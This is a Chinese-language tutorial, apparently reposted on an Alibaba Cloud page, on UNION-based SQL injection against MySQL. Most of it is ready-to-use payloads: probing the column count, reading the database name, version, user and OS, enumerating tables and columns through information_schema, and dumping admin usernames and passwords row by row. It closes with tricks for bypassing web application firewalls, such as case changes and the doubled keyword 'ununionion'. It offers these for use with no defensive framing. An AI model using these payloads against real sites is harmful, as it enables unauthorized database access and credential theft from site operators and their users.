sql注入之mysql的聯集查詢爆破

最後更新：2017-05-08 來源：互聯網

上載者：User

創建阿里雲帳戶，並獲得超過 40 款產品的免費試用版；而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊！

標籤：包含技術分享 roo sel orm color mat word 意思

mysql的聯集查詢原理就是對mysql內建的系統資料表進行查詢，因為系統資料表包含了所有資料庫的屬性。沒有access表猜不出表名列名暴力破解的尷尬。

是我針對mysql的聯集查詢，畫的系統資料表（系統資料庫）的結構

以查詢test資料庫為例:

1.判斷列數

union select 1,2,3,.......... 直到頁面返回正常為止

2.判斷當前資料庫

union select database(),2,3,4,5 1的位置將會返回資料庫的名字

資料庫名 database()

資料庫版本 version()

資料庫使用者 user()

作業系統 @@version_compile_os

3.查詢表名

union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=‘test‘

//group_concat()使多行資料在一列顯示

4.查詢列名

union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name=‘admin‘

5.查資料 (0x20是空格的意思)

方法一：

union select group_concat(username,0x20,password),2,3,4,5 from test.admin //將所有資料在一行顯示

方法二

union select concat(username,0x20,password),2,3,4,5,6 from one.admin //因為網頁限制只能顯示一行資料，所以顯示第一行資料

union select concat(username,0x20,password),2,3,4,5,6 from one.admin where username not in (‘root‘) //把第一行的使用者排除掉，第二行自動上來

union select concat(username,0x20,password),2,3,4,5,6 from one.admin where username not in (‘admin‘,‘root‘) //看第三行資料

簡單繞過waf思路：

大小寫繞過

ununionion 因為會過濾關鍵詞union，所以這樣寫過濾後，前面un和後面的ion又拼成了一個新的union

sql注入之mysql的聯集查詢爆破

本文章原先以中文撰寫並發佈於 aliyun.com，亦設英文版本，僅作資訊用途。本網站不對文章的準確性，完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴，請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡，一經驗證之後，即會刪除該侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

sql注入之mysql的聯集查詢爆破

聯繫我們

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support